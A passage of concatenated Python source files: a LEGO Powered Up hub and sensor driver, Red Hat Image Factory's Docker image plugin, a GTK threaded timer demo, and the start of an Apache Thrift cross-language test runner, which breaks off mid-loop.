self._port_dt[p]["_modes_ready"]=False
if (m==1):
cl,im,om,dt=dt[0],dt[2]+dt[3]*256,dt[4]+dt[5]*256,dt[6:]
i=0
for a in ["output","input","combinable","synchronizable"]:
self._port_dt[p][a]=cl&1<<i
i+=1
for i in range(0,16):
if (im&(1<<i)):
if (i not in self._port_dt[p]["modes"].keys()):
self._port_dt[p]["modes"][i]={}
self._port_dt[p]["modes"][i]["input"]=True
if (om&(1<<i)):
if (i not in self._port_dt[p]["modes"].keys()):
self._port_dt[p]["modes"][i]={}
self._port_dt[p]["modes"][i]["output"]=True
if (self._port_dt[p]["combinable"]==1):
self._send([0x00,0x21,p,0x02],wait=False)
self._port_dt[p]["_modes_ql"]+=1
for m in self._port_dt[p]["modes"].keys():
for v in PORT_INFO_TYPES.values():
self._send([0x00,0x22,p,m,v],wait=False)
self._port_dt[p]["_modes_ql"]+=1
if (self._port_dt[p]["_modes_ql"]==0):
self._port_dt[p]["_modes_ready"]=True
else:
self._port_dt[p]["mode_combinations"]=[]
if (len(dt)>0):
mc,dt=dt[0]+dt[1]*256,dt[2:]
while (mc!=0):
cml=[]
for i in range(16):
if (mc&(1<<i)):
cml+=[i]
self._port_dt[p]["mode_combinations"]+=[cml]
if (len(dt)==0):
break
else:
mc,dt=dt[0]+dt[1]*256,dt[2:]
self._port_dt[p]["_modes_ql"]-=1
if (self._port_dt[p]["_modes_ql"]==0):
self._port_dt[p]["_modes_ready"]=True
elif (t==0x44):
p,m,mt,dt=dt[0],dt[1],dt[2],dt[3:]
if (mt==0):
self._port_dt[p]["modes"][m]["name"]="".join([chr(b) for b in dt if b!=0])
elif (mt==1):
self._port_dt[p]["modes"][m]["raw_range"]={"min":struct.unpack("<f",bytearray(dt[0:4]))[0],"max":struct.unpack("<f",bytearray(dt[4:]))[0]}
elif (mt==2):
self._port_dt[p]["modes"][m]["pct_range"]={"min":struct.unpack("<f",bytearray(dt[0:4]))[0],"max":struct.unpack("<f",bytearray(dt[4:]))[0]}
elif (mt==3):
self._port_dt[p]["modes"][m]["si_range"]={"min":struct.unpack("<f",bytearray(dt[0:4]))[0],"max":struct.unpack("<f",bytearray(dt[4:]))[0]}
elif (mt==4):
self._port_dt[p]["modes"][m]["symbol"]="".join([chr(b) for b in dt if b!=0])
elif (mt==5):
self._port_dt[p]["modes"][m]["input_mapping"]=[PORT_MODE_INFO_MAPPING_BITS[i] for i in range(8) if (dt[0]>>i)&1]
self._port_dt[p]["modes"][m]["output_mapping"]=[PORT_MODE_INFO_MAPPING_BITS[i] for i in range(8) if (dt[1]>>i)&1]
elif (mt==128):
self._port_dt[p]["modes"][m]["datasets"]=dt[0]
self._port_dt[p]["modes"][m]["dataset_type"]=PORT_MODE_INFO_DATASET_TYPES[dt[1]]
self._port_dt[p]["modes"][m]["dataset_total_figures"]=dt[2]
self._port_dt[p]["modes"][m]["dataset_decimals"]=dt[3]
else:
print(mt)
self._port_dt[p]["_modes_ql"]-=1
if (self._port_dt[p]["_modes_ql"]==0):
self._port_dt[p]["_modes_ready"]=True
elif (t==0x45 or t==0x46):
p,dt=dt[0],dt[1:]
self._port_dt[p]["driver"]._parse_caps(dt)
elif (t==0x47 or t==0x48):
pass
elif (t==0x82):
for i in range(0,len(dt),2):
l=[]
j=0
for s in PORT_OUTPUT_FEEDBACK.keys():
if (dt[i+1]&1<<j>0):
l+=[s]
j+=1
self._port_dt[dt[i]]["driver"].feedback+=l
# print(f"FEEDBACK: port#{dt[i]} => {[PORT_OUTPUT_FEEDBACK[e] for e in l]}")
else:
print(hex(t))
except Exception as e:
traceback.print_exception(None,e,e.__traceback__)
class HubDriver:
_dl={}
@staticmethod
def get(id_):
if (id_ in HubDriver._dl.keys()):
return HubDriver._dl[id_]
return HubDriver
def __init__(self,h,p,_id=-1):
self.h=h
self.p=p
self.feedback=[0x08]
self._id=_id
self._cl=[]
self._dt=False
def __init_subclass__(cls):
HubDriver._dl[cls._id]=cls
def name(self):
return LEGO_DEVICES[self.h._port_dt[self.p]["id"]]
def setup(self):
self.h._send([0x00,0x21,self.p,0x01],wait=True)
self._setup_caps()
def _setup_caps_wr(self,cl):
self._cl=cl
def _setup_caps(self):
self.value=None
if (len(self._cl)==0):
pass
elif (len(self._cl)==1):
self.value={}
self.h._send([0x00,0x41,self.p,self._cl[0][0],self._cl[0][2],0,0,0,1])
else:
self.value={}
self.h._send([0x00,0x42,self.p,0x02])
for i in range(0,len(self._cl)):
self.h._send([0x00,0x41,self.p,self._cl[i][0],self._cl[i][2],0,0,0,1])
b=[]
for i in range(0,len(self._cl)):
for j in range(self._cl[i][3]):
b+=[16*self._cl[i][0]+j]
self.h._send([0x00,0x42,self.p,0x01,0]+b)
self.h._send([0x00,0x42,self.p,0x03])
def _parse_caps(self,dt):
if (len(self._cl)==0):
self.value=dt
elif (len(self._cl)==1):
for i in range(0,self._cl[0][3]):
if (self._cl[0][3]==1):
self.value[self._cl[0][1]]=self._to_int(dt[i*self._cl[0][4]:(i+1)*self._cl[0][4]],self._cl[0][4])
else:
if (self._cl[0][1] not in self.value):
self.value[self._cl[0][1]]={}
self.value[self._cl[0][1]][i]=self._to_int(dt[i*self._cl[0][4]:(i+1)*self._cl[0][4]],self._cl[0][4])
else:
m,dt=dt[1],dt[2:]
i=0
for j in range(0,len(self._cl)):
for k in range(0,self._cl[j][3]):
if (m&(1<<i)):
if (self._cl[j][3]==1):
self.value[self._cl[j][1]],dt=self._to_int(dt[0:self._cl[j][4]],self._cl[j][4]),dt[self._cl[j][4]:]
else:
if (self._cl[j][1] not in self.value):
self.value[self._cl[j][1]]={}
self.value[self._cl[j][1]][k],dt=self._to_int(dt[0:self._cl[j][4]]),dt[self._cl[j][4]:]
i+=1
if (len(dt)>0):
print("EXTRA: "+str(dt))
self._parse_value()
self._dt=True
def _to_int(self,dt,l):
if (l==1):
return dt[0]
if (l==2):
return struct.unpack("<H",bytearray(dt))[0]
if (l==4):
return struct.unpack("<I",bytearray(dt))[0]
return None
class PoweredUpHub(Hub):
_m_id=0x41
_name="HUB NO.4"
@staticmethod
def find(*a,**kw):
kw["t"]=PoweredUpHub
return Hub.find(*a,**kw)
def __init__(self,d):
super().__init__(d,self.__class__._name)
class PoweredUpRemote(Hub):
_m_id=0x42
_name="Handset"
@staticmethod
def find(*a,**kw):
kw["t"]=PoweredUpRemote
return Hub.find(*a,**kw)
def __init__(self,d):
super().__init__(d,self.__class__._name)
class BoostHub(Hub):
_m_id=0x40
_name="LEGO Move Hub"
@staticmethod
def find(*a,**kw):
kw["t"]=BoostHub
return Hub.find(*a,**kw)
def __init__(self,d):
super().__init__(d,self.__class__._name)
class DuploTrainHub(Hub):
_m_id=0x20
_name="Train Base"
@staticmethod
def find(*a,**kw):
kw["t"]=DuploTrainHub
return Hub.find(*a,**kw)
def __init__(self,d):
super().__init__(d,self.__class__._name)
class CPlusHub(Hub):
_m_id=0x80
_name="Control+ Hub"
@staticmethod
def find(*a,**kw):
kw["t"]=CPlusHub
return Hub.find(*a,**kw)
def __init__(self,d):
super().__init__(d,self.__class__._name)
class LargeMotor(HubDriver):
_id=0x2e
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(1,"speed",1,1,1),(2,"pos",1,1,4)])
self._w_r=False
def _parse_value(self):
if (self._w_r==True):
if (self.value["speed"]<=2):
self._w_r=False
self.h._send([0x00,0x81,self.p,0x11,0x51,0,0])
def _to_bytes(self,sp):
return (100 if sp>100 else (sp&255 if sp<0 else sp))
def set_pos(self,ps,sp,m_pw=50,e_st=1):
self.h._send([0x00,0x81,self.p,0x11,0x0d]+list(struct.pack("i",ps))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),3])
def rotate(self,d,sp,m_pw=50,e_st=1,adp=0b00):
self.h._send([0x00,0x81,self.p,0x11,0x0b]+list(struct.pack("i",d))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),adp],wait=False)
def set_speed(self,sp):
self.h._send([0x00,0x81,self.p,0x11,0x51,0,self._to_bytes(sp)],wait=True)
def wait_until_resistance(self):
self._w_r=True
while (self._w_r==True):
pass
class XLMotor(HubDriver):
_id=0x2f
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(1,"speed",1,1,1),(2,"pos",1,1,4)])
self._w_r=False
def _parse_value(self):
if (self._w_r==True):
if (self.value["speed"]<=2):
self._w_r=False
self.h._send([0x00,0x81,self.p,0x11,0x51,0,0])
def _to_bytes(self,sp):
return (100 if sp>100 else (sp&255 if sp<0 else sp))
def set_pos(self,ps,sp,m_pw=50,e_st=1):
self.h._send([0x00,0x81,self.p,0x11,0x0d]+list(struct.pack("i",ps))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),3])
def rotate(self,d,sp,m_pw=50,e_st=1):
self.h._send([0x00,0x81,self.p,0x11,0x0b]+list(struct.pack("i",d))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),0],wait=False)
def set_speed(self,sp):
self.h._send([0x00,0x81,self.p,0x11,0x51,0,self._to_bytes(sp)],wait=True)
def wait_until_resistance(self):
self._w_r=True
while (self._w_r==True):
pass
class ExternalTachoMotor(HubDriver):
_id=0x26
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(1,"speed",1,1,1),(2,"pos",1,1,4)])
self._w_r=False
def _parse_value(self):
if (self._w_r==True):
if (self.value["speed"]<=2):
self._w_r=False
self.h._send([0x00,0x81,self.p,0x11,0x51,0,0])
def _to_bytes(self,sp):
return (100 if sp>100 else (sp&255 if sp<0 else sp))
def set_pos(self,ps,sp,m_pw=50,e_st=1):
self.h._send([0x00,0x81,self.p,0x11,0x0d]+list(struct.pack("i",ps))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),3])
def rotate(self,d,sp,m_pw=50,e_st=1):
self.h._send([0x00,0x81,self.p,0x11,0x0b]+list(struct.pack("i",d))+[self._to_bytes(sp),m_pw,(0 if e_st==0 else (126 if e_st==1 else 127)),3])
def set_speed(self,sp):
self.h._send([0x00,0x81,self.p,0x11,0x51,0,self._to_bytes(sp)])
def wait_until_resistance(self):
self._w_r=True
while (self._w_r==True):
pass
class VisionSensor(HubDriver):
_id=0x25
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._md=0
self._setup_caps_wr([(0,"basic_color",1,1,1)])
def _parse_value(self):
if ("basic_color" in self.value):
self.value["basic_color"]=VISION_SENSOR_COLOR_DECODE[self.value["basic_color"]]
if ("rgb_color" in self.value):
self.value["rgb_color"]={"red":self.value["rgb_color"][0],"green":self.value["rgb_color"][1],"blue":self.value["rgb_color"][2]}
def set_mode(self,m):
if (type(m)==str):
m=VISION_SENSOR_MODES.index(m)
if (m!=self._md):
self._md=m
self._setup_caps_wr([(m,VISION_SENSOR_MODES[m],1,(3 if m==6 else 1),(4 if m==2 else (2 if m in [6,7] else 1)))])
class RGBLed(HubDriver):
_id=0x17
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._md=0
self._setup_caps_wr([(0,"preset_color",0,0,0)])
def _parse_value(self):
pass
def set_color(self,c):
if (type(c)==str):
c=RGB_LED_COLORS.index(c.lower())
if (type(c)==int):
if (self._md==1):
self._setup_caps_wr([(0,"preset_color",0,0,0)])
self.h._send([0x00,0x41,self.p,0x00,0,0,0,0,0])
self._md=0
self.h._send([0x00,0x81,self.p,0x11,0x51,0x00,c])
else:
if (self._md==0):
self._setup_caps_wr([(1,"rgb_color",0,0,0)])
self._md=1
self.h._send([0x00,0x81,self.p,0x11,0x51,0x01]+c)
class GyroSensor(HubDriver):
_id=0x3a
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"gyro",1,3,2)])
self._ld_tm=-1
self._l_dt=[None]*3
self._off=[0]*3
self._off_l=[None]*3
self._g_dt={GYRO_SENSOR_VALUES[i]:0 for i in range(0,3)}
def _parse_value(self):
tm=time.time()
if (self._ld_tm==-1):
self._ld_tm=tm+0
self._ld_tm=tm+0
for i in range(3):
v=(self.value["gyro"][i]+2**15)%2**16-2**15
if (self._l_dt[i]!=None and abs(v-self._l_dt[i])>=25):
self._off[i]+=int((v-self._l_dt[i])/655.36*100)/100
self._l_dt[i]=v
if (self._l_dt[i] is None):
self._l_dt[i]=v
self._g_dt[GYRO_SENSOR_VALUES[i]]+=self._off[i]+0
self.value={"gyro":self._g_dt}
class TemperatureSensor(HubDriver):
_id=0x3c
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"temperature",1,1,2)])
def _parse_value(self):
self.value["temperature"]=self.value["temperature"]/10
class BatteryCurrent(HubDriver):
_id=0x15
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"current",1,1,2)])
def _parse_value(self):
pass
class BatteryVoltage(HubDriver):
_id=0x14
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"voltage",1,1,2)])
def _parse_value(self):
pass
class AccelerometerSensor(HubDriver):
_id=0x39
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"acceleration",1,3,2)])
def _parse_value(self):
dt={}
for i in range(3):
dt[ACCELEROMETER_SENSOR_VALUES[i]]=(self.value["acceleration"][i]/655.36+50)%100-50
self.value={"acceleration":dt}
class PositionSensor(HubDriver):
_id=0x3b
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"position",1,3,2)])
def _parse_value(self):
dt={}
for i in range(3):
dt[i]=(self.value["position"][i]/255+128)%255-128
self.value={"position":dt}
class GestureSensor(HubDriver):
_id=0x36
def __init__(self,h,p):
super().__init__(h,p,self.__class__._id)
self._setup_caps_wr([(0,"gesture",1,1,1)])
def _parse_value(self):
pass
|
Docker.py | #!/usr/bin/python
#
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import zope
import libxml2
import json
import os
import os.path
import struct
import subprocess
import datetime
import random
import shutil
import oz.TDL
import tempfile
import tarfile
import threading
import subprocess
from xml.etree.ElementTree import fromstring
from imgfac.Template import Template
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.BuildDispatcher import BuildDispatcher
from imgfac.ImageFactoryException import ImageFactoryException
from imgfac.CloudDelegate import CloudDelegate
from imgfac.FactoryUtils import launch_inspect_and_mount, shutdown_and_close, remove_net_persist, create_cloud_info, parameter_cast_to_bool
class Docker(object):
zope.interface.implements(CloudDelegate)
compress_commands = { "xz": "xz -T 0 --stdout %s > %s",
"gzip": "gzip -c %s > %s",
"bzip2": "bzip2 -c %s > %s" }
# The templates below allow us to generate base images without a running docker locally
# imcleod@redhat.com - 26-Aug-2014
# We know of at least two different output JSON formats. These relate to some JSON marshaling
# changes in the docker 1.0.0 timeframe. At the time of this comment, the upstream registry will
# only accept the older 0.11.1 format which is what we default to.
# Note that there is a separate "VERSION" file in each subdirectory. As of this comment
# that file always contains 1.0
# TODO: Get rid of these silly string templates and just use the json module and dicts
#
# vbatts pointed out that creating these as string templates is kind of silly
# since we can just build them up as nested dicts and use json tools to create
# the required strings. I originally used strings to ensure absolute fidelity to
# the observed docker output, but there's no real technical reason to do this
docker_json_template_0_11_1 = """{{
"id": "{idstring}",
"comment": "{commentstring}",
"created": "{createdtime}",
"container_config": {{
"Cmd": {cmd},
"Env": {env},
"Label": {label},
"StdinOnce": false,
"OpenStdin": false,
"Tty": false,
"ExposedPorts": null,
"AttachStdin": false,
"AttachStdout": false,
"Image": "",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": null,
"NetworkDisabled": false,
"OnBuild": null,
"CpuShares": 0,
"MemorySwap": 0,
"Memory": 0,
"User": "",
"Domainname": "",
"Hostname": "",
"AttachStderr": false,
"PortSpecs": null
}},
"docker_version": "0.11.1",
"architecture": "{arch}",
"os": "{os}",
"Size": {size}
}}"""
docker_json_template_1_0_0 = """{{
"Comment": "{commentstring}",
"Container": "",
"DockerVersion": "1.0.0",
"Parent": "",
"Author": "",
"Os": "{os}",
"Created": "{createdtime}",
"Architecture": "{arch}",
"ContainerConfig": {{
"MemorySwap": 0,
"Hostname": "",
"Entrypoint": null,
"PortSpecs": null,
"Memory": 0,
"OnBuild": null,
"OpenStdin": false,
"Cpuset": "",
"Env": {env},
"User": "",
"CpuShares": 0,
"AttachStdout": false,
"NetworkDisabled": false,
"WorkingDir": "",
"Cmd": {cmd},
"Label": {label},
"StdinOnce": false,
"AttachStdin": false,
"Volumes": null,
"Tty": false,
"AttachStderr": false,
"Domainname": "",
"Image": "",
"ExposedPorts": null
}},
"Config": null,
"Id": "{idstring}",
"Size": {size}
}}
"""
docker_templates_dict = { "0.11.1": docker_json_template_0_11_1,
"1.0.0": docker_json_template_1_0_0 }
def __init__(self):
super(Docker, self).__init__()
self.app_config = ApplicationConfiguration().configuration
self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
def activity(self, activity):
# Simple helper function
# Activity should be a one line human-readable string indicating the task in progress
# We log it at DEBUG and also set it as the status_detail on our active image
self.log.debug(activity)
self.active_image.status_detail['activity'] = activity
def push_image_to_provider(self, builder, provider, credentials, target, target_image, parameters):
raise ImageFactoryException("Pushing not currently supported for Docker image builds")
def snapshot_image_on_provider(self, builder, provider, credentials, template, parameters):
# TODO: Implement snapshot builds
raise ImageFactoryException("Snapshot builds not currently supported for Docker")
def _generate_docker_id(self):
# return a random 64 digit hex number
did = ""
for i in range(8):
did += "%08x" % (random.randint(0, 2 ** 32))
return did
def builder_should_create_target_image(self, builder, target, image_id, template, parameters):
self.log.debug("builder_should_create_target_image called for Docker plugin - doing all our work here then stopping the process")
tdlobj = oz.TDL.TDL(xmlstring=template.xml, rootpw_required=self.app_config["tdl_require_root_pw"])
if tdlobj.arch != "x86_64":
raise Exception("Docker plugin currently supports only x86_64 images")
# At this point our input base_image is available as builder.base_image.data
# We simply mount it up in libguestfs and tar out the results as builder.target_image.data
wrap_metadata = parameter_cast_to_bool(parameters.get('create_docker_metadata', True))
compress_type = parameters.get('compress', None)
if compress_type:
if compress_type in self.compress_commands.keys():
compress_command = self.compress_commands[compress_type]
else:
raise Exception("Passed unknown compression type (%s) for Docker plugin" % (compress_type))
else:
compress_command = None
guestfs_handle = launch_inspect_and_mount(builder.base_image.data, readonly = True)
storagedir = os.path.dirname(builder.target_image.data)
# guestfs lets us mount locally via the API, which is cool, but requires that
# we call a blocking function to activate the mount, which requires a thread
# We also need a temp dir to mount it to - do our best to clean up when things
# go wrong
tempdir = None
fuse_thread = None
try:
tempdir = tempfile.mkdtemp(dir=storagedir)
self.log.debug("Mounting input image locally at (%s)" % (tempdir))
guestfs_handle.mount_local(tempdir)
def _run_guestmount(g):
g.mount_local_run()
self.log.debug("Launching mount_local_run thread")
fuse_thread = threading.Thread(group=None, target=_run_guestmount, args=(guestfs_handle,))
fuse_thread.start()
self.log.debug("Creating tar of entire image")
# Use acls and xattrs to ensure SELinux data is not lost
# Use --sparse to avoid exploding large empty files from input image
tarcmd = [ 'tar', '-cf', builder.target_image.data, '-C', tempdir, '--sparse', '--acls', '--xattrs', './' ]
subprocess.check_call(tarcmd)
if wrap_metadata:
self.log.debug("Estimating size of tar contents to include in Docker metadata")
size = 0
for root, dirs, files in os.walk(tempdir):
for name in files:
fp = os.path.join(root,name)
if os.path.isfile(fp) and not os.path.islink(fp):
size += os.path.getsize(fp)
self.log.debug("Total real file content size (%d)" % (size))
except Exception, e:
self.log.exception(e)
raise
finally:
if tempdir:
try:
subprocess.check_call( ['umount', '-f', tempdir] )
os.rmdir(tempdir)
except Exception, e:
self.log.exception(e)
self.log.error("WARNING: Could not unmount guest at (%s) - may still be mounted" % (tempdir) )
if fuse_thread:
fuse_thread.join(30.0)
if fuse_thread.isAlive():
self.log.error("Guestfs local mount thread is still active - FUSE filesystem still mounted at (%s)" % (tempdir) )
if wrap_metadata:
# Get any parameters and if they are not set, create our defaults
repository = parameters.get('repository',tdlobj.name)
tag = parameters.get('tag','latest')
docker_image_id = parameters.get('docker_image_id', self._generate_docker_id())
cmd = parameters.get('docker_cmd', 'null')
env = parameters.get('docker_env', 'null')
label = parameters.get('docker_label', 'null')
rdict = { repository: { tag: docker_image_id } }
dockerversion = parameters.get('dockerversion', '0.11.1')
if not dockerversion in self.docker_templates_dict:
raise Exception("No docker JSON template available for specified docker version (%s)" % (dockerversion))
docker_json_template=self.docker_templates_dict[dockerversion]
tdict = { }
tdict['commentstring'] = parameters.get('comment', 'Created by Image Factory')
tdict['os'] = parameters.get('os', 'linux')
tdict['createdtime'] = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
tdict['arch'] = "amd64"
tdict['idstring'] = docker_image_id
tdict['cmd'] = cmd
tdict['env'] = env
tdict['label'] = label
tdict['size'] = size
image_json = docker_json_template.format(**tdict)
# Create directory
storagedir = os.path.dirname(builder.target_image.data)
tempdir = None
try:
tempdir = tempfile.mkdtemp(dir=storagedir)
self.log.debug("Creating docker image directory structure in (%s)" % (tempdir))
repositories_path = os.path.join(tempdir,'repositories')
repositories = open(repositories_path,"w")
json.dump(rdict, repositories)
repositories.close()
imagedir = os.path.join(tempdir, docker_image_id)
os.mkdir(imagedir)
jsonfile_path = os.path.join(imagedir,'json')
jsonfile = open(jsonfile_path,'w')
jsonfile.write(image_json)
jsonfile.close()
versionfile_path = os.path.join(imagedir,'VERSION')
versionfile = open(versionfile_path, 'w')
# TODO - Track version developments and compatibility
versionfile.write("1.0")
versionfile.close()
layerfile_path = os.path.join(imagedir,'layer.tar')
shutil.move(builder.target_image.data, layerfile_path)
outtar = tarfile.TarFile(name=builder.target_image.data, mode="w")
# It turns out that in at least some configurations or versions, Docker will
# complain if the repositories file is not the last file in the archive
# we add our single image directory first and then the repositories file to
# avoid this
outtar.add(imagedir, arcname=docker_image_id)
outtar.add(repositories_path, arcname='repositories')
outtar.close()
finally:
if tempdir:
try:
shutil.rmtree(tempdir)
except:
self.log.warning("Error encountered when removing temp dir (%s) - may not have been deleted" % (tempdir))
if compress_command:
self.log.debug("Compressing tar file using %s" % (compress_type))
rawimage = builder.target_image.data
compimage = builder.target_image.data + ".tmp.%s" % (compress_type)
result = subprocess.call(compress_command % ( rawimage, compimage), shell = True)
if result:
raise Exception("Compression of image failed")
self.log.debug("Compression complete, replacing original")
os.unlink(rawimage)
os.rename(compimage, rawimage)
self.log.debug("Done")
return False
def builder_will_create_target_image(self, builder, target, image_id, template, parameters):
raise ImageFactoryException("builder_will_create_target_image called in Docker plugin - this should never happen")
def builder_did_create_target_image(self, builder, target, image_id, template, parameters):
raise ImageFactoryException("builder_did_create_target_image called in Docker plugin - this should never happen")
|
threadtest3.py | #!/usr/bin/python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk,Pango,GObject
import threading
import datetime
import time
class MyWindow(Gtk.Window):
def __init__(self):
self.timer = None
self.event = None
self.clock = '00:00:00'
Gtk.Window.__init__(self, title="Timer")
self.set_default_size(800, 450)
self.button_start = Gtk.Button(label="Start")
self.button_start.connect("clicked",self.start_timer)
self.button_stop = Gtk.Button(label="Stop")
self.button_stop.connect("clicked",self.stop_timer)
self.status = Gtk.Label()
self.status.set_text(self.clock)
# override_font is deprecated but good enough for a preview.
font = Pango.FontDescription("Tahoma 48")
self.status.override_font(font)
self.vbox = Gtk.VBox()
self.vbox.pack_start(self.button_start,False,False,5)
self.vbox.pack_start(self.button_stop,False,False,5)
self.vbox.pack_end(self.status,True,True,5)
self.add(self.vbox)
def get_time(self):
seconds = 0
while not self.event.is_set():
seconds += 1
self.clock = str(datetime.timedelta(seconds = seconds))
self.status.set_text(self.clock)
time.sleep(1)
def start_timer(self,button):
print('start')
self.timer = threading.Thread(target=self.get_time)
self.event = threading.Event()
self.timer.daemon=True
self.timer.start()
def stop_timer(self,button):
print('stop')
self.event.set() # stops loop in get_time
self.timer = None # disposes of timer thread
win = MyWindow()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main() |
test.py | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import division
import time
import socket
import subprocess
import sys
import os
import signal
import json
import platform
import shutil
import threading
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--port", type="int", dest="port", default=9090,
help="port number for server to listen on")
parser.add_option('-v', '--verbose', action="store_const",
dest="verbose", const=2,
help="verbose output")
parser.add_option('-q', '--quiet', action="store_const",
dest="verbose", const=0,
help="minimal output")
parser.set_defaults(verbose=1)
options, args = parser.parse_args()
def relfile(fname):
return os.path.join(os.path.dirname(__file__), fname)
def getSocketArgs(socket_type):
if socket_type == 'ip':
return ""
elif socket_type == 'ip-ssl':
return "--ssl"
elif socket_type == 'domain':
return "--domain-socket=/tmp/ThriftTest.thrift"
def runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, server_protocol, client_protocol, transport, port, use_zlib, socket_type):
# Build command line arguments
server_args = []
cli_args = []
if server_lib == 'java':
server_executable[2] = relfile(server_executable[2])
server_args.extend(server_executable)
server_args.extend(['-Dtestargs','\"'])
else:
server_args = [relfile(server_executable)]
if client_lib == 'java':
client_executable[2] = relfile(client_executable[2])
cli_args.extend(client_executable)
cli_args.extend(['-Dtestargs','\"'])
else:
cli_args = [relfile(client_executable)]
server_args.append('--protocol=%s' % server_protocol)
cli_args.append('--protocol=%s' % client_protocol)
for which in (server_args, cli_args):
which.append('--transport=%s' % transport)
which.append('--port=%d' % port) # default to 9090
if use_zlib:
which.append('--zlib')
if socket_type == 'ip-ssl':
which.append('--ssl')
elif socket_type == 'domain':
which.append('--domain-socket=/tmp/ThriftTest.thrift')
# if options.verbose == 0:
# which.append('-q')
# if options.verbose == 2:
# which.append('-v')
if server_lib == 'java':
server_args.append('\"')
if client_lib == 'java':
cli_args.append('\"')
server_args.extend(server_extra_args)
cli_args.extend(client_extra_args)
server_log=open("log/" + test_name + "_server.log","a")
client_log=open("log/" + test_name + "_client.log","a")
try:
if options.verbose > 0:
print 'Testing server: %s' % (' '.join(server_args))
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
else:
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
def ensureServerAlive():
if serverproc.poll() is not None:
return 'Server subprocess died, args: %s' % (' '.join(server_args))
# Wait for the server to start accepting connections on the given port.
sock = socket.socket()
sleep_time = 0.1 # Seconds
max_attempts = 100
try:
attempt = 0
if socket_type != 'domain':
while sock.connect_ex(('127.0.0.1', port)) != 0:
attempt += 1
if attempt >= max_attempts:
return "TestServer not ready on port %d after %.2f seconds" % (port, sleep_time * attempt)
ensureServerAlive()
time.sleep(sleep_time)
finally:
sock.close()
try:
o = []
def target():
try:
if options.verbose > 0:
print 'Testing client: %s' % (' '.join(cli_args))
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
else:
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
except:
return "Unexpected error:", sys.exc_info()[0]
thread = threading.Thread(target=target)
thread.start()
thread.join(10)
if thread.is_alive():
print 'Terminating process'
o[0].terminate()
thread.join()
if(len(o)==0):
return "Client subprocess failed, args: %s" % (' '.join(cli_args))
ret = o[0].returncode
if ret != 0:
return "Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args))
#raise Exception("Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args)))
finally:
# check that server didn't die
#ensureServerAlive()
extra_sleep = 0
if extra_sleep > 0 and options.verbose > 0:
print ('Giving (protocol=%s,zlib=%s,ssl=%s) an extra %d seconds for child'
'processes to terminate via alarm'
% (protocol, use_zlib, use_ssl, extra_sleep))
time.sleep(extra_sleep)
os.kill(serverproc.pid, signal.SIGKILL)
serverproc.wait()
client_log.flush()
server_log.flush()
client_log.close()
server_log.close()
test_count = 0
failed = 0
platform = platform.system()
if os.path.exists('log'): shutil.rmtree('log')
os.makedirs('log')
if os.path.exists('results.json'): os.remove('results.json')
results_json = open("results.json","a")
results_json.write("[\n")
with open('tests.json') as data_file:
data = json.load(data_file)
#subprocess.call("export NODE_PATH=../lib/nodejs/test:../lib/nodejs/lib:${NODE_PATH}")
count = 0
for server in data["server"]:
server_executable = server["executable"]
server_extra_args = ""
server_lib = server["lib"]
if "extra_args" in server:
server_extra_args = server["extra_args"]
for protocol in server["protocols"]:
for transport in server["transports"]:
for sock in server["sockets"]:
for client in data["client"]:
if platform in server["platform"] and platform in client["platform"]:
client_executable = client["executable"]
client_extra_args = ""
client_lib = client["lib"]
